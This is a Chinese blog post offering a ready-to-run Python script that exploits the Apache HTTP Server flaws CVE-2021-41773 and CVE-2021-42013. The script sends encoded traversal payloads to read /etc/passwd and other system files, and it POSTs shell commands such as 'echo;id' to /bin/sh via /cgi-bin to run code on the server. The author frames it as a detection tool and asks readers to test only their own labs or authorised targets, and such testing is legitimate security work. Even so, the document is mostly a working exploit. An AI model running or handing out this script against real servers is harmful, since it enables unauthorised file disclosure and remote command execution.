自己在家写的简单的脚本检测,没有多么炫酷,代码的备注都给你们写的好好的,给小女点个赞再走咯。为啥使用 urllib 而不用 requests 模块,是因为在写的时候发现 requests 模块会对 URL 进行转码,`/.%2e/` 这类 payload 发到服务端时已经不是原样了,所以改用比较老的 urllib 模块(它会把路径原封不动地发出去)。
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# author: trance
# datetime: 2021/12/2 0002 22:29
# !/usr/bin/env python3
# -*- coding: utf-8 -*-
# author: trance
# datetime: 2021/10/18 0018 21:15
from urllib import request
from urllib.request import ProxyHandler, build_opener
import sys
#检测目录穿越
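def directoryTraversalTest(url, headers1, opener, payloads=None, traversals=None, folders=None):
    """Probe ``url`` for the Apache path-traversal bugs CVE-2021-41773 / CVE-2021-42013.

    Every combination of ``folders`` x ``traversals`` x ``payloads`` is appended
    to ``url`` and fetched with GET through ``opener``. A 200 response is
    treated as a successful read of the target file: the (truncated) body and
    the URL are printed and the URL is collected in the returned list.

    Args:
        url: Base URL of the target, e.g. ``http://host:8080`` (no trailing slash).
        headers1: Dict of request headers sent with every probe.
        opener: ``urllib.request.OpenerDirector`` (or any object with ``open``)
            used to send the requests; this is how the proxy is applied.
        payloads: Absolute file paths to try reading; defaults to the
            module-level ``payloadFile`` list.
        traversals: Encoded ``../`` sequences; defaults to the module-level
            ``ulist``.
        folders: Alias directories to start the traversal from; defaults to
            the module-level ``folderlist``.

    Returns:
        List of full URLs that answered HTTP 200.

    Note:
        Failed probes (connection errors, 403/404 raised by urllib as
        ``HTTPError``, malformed URLs, ...) are printed and skipped so one
        dead host or one denied alias does not abort the whole scan.
    """
    if payloads is None:
        payloads = payloadFile
    if traversals is None:
        traversals = ulist
    if folders is None:
        folders = folderlist

    hits = []
    for readfile in payloads:
        for traversal in traversals:
            for folder in folders:
                allurls = url + folder + traversal + readfile
                try:
                    req0 = request.Request(allurls, headers=headers1, method='GET')
                    # urllib responses are context managers; this closes the
                    # socket even when we stop reading early.
                    with opener.open(req0) as resp:
                        if resp.getcode() == 200:
                            # Bounded read: a hostile server could otherwise
                            # stream an unlimited body. Print the bytes object
                            # (repr form) rather than decoding it so the server
                            # cannot inject terminal escape sequences.
                            print(resp.read(4096))
                            print(allurls + ' 该url攻击成功,存在目录穿越漏洞')
                            hits.append(allurls)
                except Exception as e:  # best-effort scanner loop: report and keep going
                    print('请求异常:' + str(e))
    return hits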
#检测任意命令执行
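def exploitShell(url, mkdir, opener, shellPostDataList, headers1, num=None, shells=None, traversals=None):
    """Probe for command execution via traversal into /bin/* through mod_cgi (CVE-2021-41773 / CVE-2021-42013).

    When the traversal lands in a CGI-enabled alias (normally ``/cgi-bin``),
    Apache runs the traversed-to shell as a CGI script and feeds it the POST
    body on stdin, so a body such as ``echo;id`` executes on the server.
    Every ``traversals`` x ``shells`` combination is POSTed; a 200 whose body
    is *not* an ELF binary is reported as successful command execution (a 200
    that starts with the ELF magic means the server served the file instead
    of executing it, i.e. traversal works but CGI is not enabled there).

    Args:
        url: Base URL of the target, e.g. ``http://host:8080`` (no trailing slash).
        mkdir: Alias directory the traversal starts from; must be served by
            mod_cgi/mod_cgid for the request to be executed.
        opener: ``urllib.request.OpenerDirector`` (or any object with ``open``)
            used to send the requests.
        shellPostDataList: Candidate POST bodies (shell command lines).
        headers1: Dict of request headers sent with every probe.
        num: Index into ``shellPostDataList``; prompted for interactively when
            ``None`` (the original behaviour).
        shells: Absolute paths of shell binaries to traverse to; defaults to
            the module-level ``shellFile`` list.
        traversals: Encoded ``../`` sequences; defaults to the module-level
            ``ulist``.

    Returns:
        List of full URLs on which the command was executed.

    Raises:
        IndexError: if an explicit ``num`` is outside ``shellPostDataList``.
    """
    if shells is None:
        shells = shellFile
    if traversals is None:
        traversals = ulist
    if num is None:
        num = _prompt_command_index(shellPostDataList)
    elif not 0 <= num < len(shellPostDataList):
        raise IndexError('num %d out of range for %d commands' % (num, len(shellPostDataList)))
    # Encode once: urllib needs bytes for the POST body.
    data = shellPostDataList[num].encode()

    hits = []
    for traversal in traversals:
        for shell in shells:
            fullurl = url + mkdir + traversal + shell
            print(fullurl)
            try:
                # Passing data= turns the request into a POST.
                req0 = request.Request(fullurl, headers=headers1, data=data)
                # Context manager closes the socket even on early exit.
                with opener.open(req0) as resp:
                    if resp.getcode() == 200:
                        # Bounded read; printed as bytes (repr form) so server
                        # output cannot inject terminal escape sequences.
                        body = resp.read(4096)
                        print(body)
                        if body.startswith(b'\x7fELF'):
                            # Apache served the shell binary instead of running
                            # it: traversal works, but this alias has no CGI.
                            print(fullurl + ' 返回的是二进制文件内容(可穿越读取,但未作为CGI执行)')
                        else:
                            print(fullurl + ' 该url攻击成功,存在任意命令执行')
                            hits.append(fullurl)
            except Exception as e:  # best-effort scanner loop: report and keep going
                print('请求异常:' + str(e))
    return hits


def _prompt_command_index(choices):
    """Ask the user which entry of ``choices`` to send; re-prompt on bad input."""
    # Built from the list so the prompt cannot go stale when commands are added;
    # for the default two commands it reads exactly as before.
    prompt = '输入0-{}选择执行的命令 '.format(len(choices) - 1) + ' '.join(
        '{}:{}'.format(i, cmd) for i, cmd in enumerate(choices))
    while True:
        try:
            idx = int(input(prompt))
        except ValueError:
            print('您输入的有误请重新输入')
            continue
        if 0 <= idx < len(choices):
            return idx
        print('您输入的有误请重新输入')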
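if __name__ == '__main__':
    # Usage: python script.py <target url> [proxy host:port]
    if len(sys.argv) < 2:
        print('用法: python {} <目标url> [代理地址,默认127.0.0.1:8080]'.format(sys.argv[0]))
        sys.exit(1)

    # Alias directories to start the traversal from. "/icons" and "/cgi-bin"
    # are Apache's stock aliases; the rest are common application paths.
    folderlist = ['/icons', '/cgi-bin', '/assets', '/uploads', '/img', '/image']
    # folderlist = ['/icons']

    # Encoded "../" sequences. The server must receive them un-normalised,
    # which is why this script uses urllib rather than requests.
    ulist = []
    # cve-2021-41773 (Apache 2.4.49): single-encoded ".%2e"
    ulist.append("/.%2e/%2e%2e/%2e%2e/%2e%2e")
    ulist.append("/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e")
    # cve-2021-42013 (Apache 2.4.50, incomplete fix): double-encoded variants
    ulist.append("/.%%32%65/.%%32%65/.%%32%65/.%%32%65")
    ulist.append("/.%%32e/.%%32e/.%%32e/.%%32e")
    ulist.append("/.%2%65/.%2%65/.%2%65/.%2%65")
    ulist.append("/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65")

    # Files to try reading. These are the ones the author confirmed readable
    # on the lab target; extend the list as needed.
    payloadFile = ["/etc/adduser.conf",
                   "/etc/passwd",
                   "/etc/host.conf",
                   "/etc/group",
                   "/etc/issue",
                   "/etc/mtab",
                   "/etc/shells",
                   "/etc/fstab",
                   "/etc/hostname"]

    # POST bodies for the CGI command-execution check; any shell command line
    # can be added. The second variant emits a Content-Type line first,
    # presumably so Apache treats the output as a well-formed CGI response.
    shellPostDataList = ["echo;id", "echo Content-Type: text/plain; echo; id"]
    # Shell binaries to traverse to from the CGI alias.
    shellFile = ["/bin/sh", "/bin/bash", "/bin/rbash", "/bin/dash"]

    # Request headers (browser-like UA; form content type for the POST body).
    headers1 = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.116 Safari/537.36",
        'Content-Type': 'application/x-www-form-urlencoded'
    }

    # Every request is sent through this proxy (e.g. Burp) so it can be
    # inspected. If nothing is listening there, every probe fails with a
    # connection error, so the address can be overridden as the 2nd argument.
    proxy = sys.argv[2] if len(sys.argv) > 2 else '127.0.0.1:8080'
    proxy_handler = ProxyHandler({
        'http': proxy,
        'https': proxy
    })
    opener = build_opener(proxy_handler)

    # Strip a trailing slash so the alias folders concatenate cleanly.
    url = sys.argv[1].rstrip('/')
    # url = "http://192.168.78.130:8080"  (author's local docker lab)

    # Menu loop: pick which check to run.
    while True:
        choice = input('输入对于数字 1:检测是否存在目录穿越,2:检测是否存在任意命令执行,3退出检测程序')
        try:
            numbers = int(choice)
        except ValueError:
            # Non-numeric input used to crash the script; re-prompt instead.
            print('您输入的有误请重新输入')
            continue
        if numbers == 1:
            directoryTraversalTest(url, headers1, opener)
        elif numbers == 2:
            # Command execution only works from a CGI-enabled alias.
            mkdir = '/cgi-bin'
            exploitShell(url, mkdir, opener, shellPostDataList, headers1)
        elif numbers == 3:
            break
        else:
            print('您输入的有误请重新输入')
    # Notes: CVE-2021-41773 and CVE-2021-42013 need different encodings (see
    # ulist). Command execution requires mod_cgi or mod_cgid to be enabled on
    # the server; plain traversal only reaches directories Apache's config
    # permits access to.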
使用方法:
打开 cmd 输入命令(不要照抄哦): python + 空格 + 代码路径 + 空格 + 检测 url,按回车;然后按提示输入数字选择检测项(1 目录穿越,2 任意命令执行,3 退出)。注意脚本默认把所有请求走 127.0.0.1:8080 代理(比如 Burp),没开代理的话请求会全部报错;只对自己搭的靶场或已获授权的目标测试。
靶场搭建可以看看:CVE-2021-41773漏洞复现_dreamthe的博客-CSDN博客